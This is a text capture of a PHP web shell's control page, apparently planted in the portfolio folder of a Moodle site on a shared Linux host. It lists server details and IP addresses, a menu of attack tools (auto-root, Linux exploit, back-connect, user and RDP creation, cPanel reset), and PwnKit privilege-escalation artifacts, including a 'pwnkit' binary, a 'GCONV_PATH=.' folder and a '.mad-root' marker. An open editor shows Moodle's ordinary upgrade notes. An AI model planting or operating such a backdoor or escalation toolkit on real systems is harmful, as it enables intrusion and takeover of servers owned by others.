Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.126.134
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
portfolio /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
boxnet
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
download
[ DIR ]
drwxr-xr-x
evernote
[ DIR ]
drwxr-xr-x
flickr
[ DIR ]
drwxr-xr-x
googledocs
[ DIR ]
drwxr-xr-x
mahara
[ DIR ]
drwxr-xr-x
picasa
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add.php
12.38
KB
-rw-r--r--
file.php
2.12
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
upgrade.txt
1.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upgrade.txt
This files describes API changes in /portfolio/ portfolio system, information provided here is intended especially for developers. === 3.7 === * The portfolio_cron() function has been removed. Please use portfolio_cron_task scheduled task instead. === 3.1 === * The following functions, previously used (exclusively) by upgrade steps are not available anymore because of the upgrade cleanup performed for this version. See MDL-51580 for more info: - portfolio_picasa_admin_upgrade_notification() - portfolio_googledocs_admin_upgrade_notification() - portfolio_boxnet_admin_upgrade_notification() === 2.4 === The set_callback_options function's third parameter has been changed from a file path to the component name - see MDL-33791. However, if any existing code passes a file path Moodle will attempt to obtain the component name from the file path provided. Also, the callback class should be located in the module's locallib.php file. Example of change: This: $button->set_callback_options('assignment_portfolio_caller', array('id' => $this->cm->id, 'fileid' => $file->get_id()), '/mod/assignment/locallib.php'); Now becomes: $button->set_callback_options('assignment_portfolio_caller', array('id' => $this->cm->id, 'fileid' => $file->get_id()), 'mod_assignment'); === 2.3 === required changes: * The following methods must now be declared static for php5 compatibility: - admin_config_form - admin_config_validation
Close